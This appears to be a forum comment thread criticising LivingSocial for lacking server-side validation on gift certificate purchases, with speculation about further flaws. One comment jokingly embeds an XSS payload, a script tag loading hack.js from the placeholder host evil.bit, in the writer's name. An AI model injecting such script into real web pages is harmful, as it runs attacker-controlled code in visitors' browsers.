Ah, the article should have mentioned that you don't get the gift certificates immediately. That means LivingSocial's not completely screwed just yet.
Nonetheless, not having server-side validation built-in indicates pretty bad practice. For one, it causes them a lot of grief and work reversing all the transactions. But further, it indicates that they probably have gaping security flaws laying around waiting to be exploited.
My thoughts exactly. Server side validation is basic. There is nothing special you need to do to make it work and a lot of web frameworks now take care of 99% of that code for you anyways. This makes me think that on the software side of things, they are skipping basic steps. If I were looking, I'd consider SQL injections next. Or even XSS attacks. Yes, my name really is Igor<script src="http://evil.bit/hack.js type="text/javascript"></script>.
Nonetheless, not having server-side validation built-in indicates pretty bad practice. For one, it causes them a lot of grief and work reversing all the transactions. But further, it indicates that they probably have gaping security flaws laying around waiting to be exploited.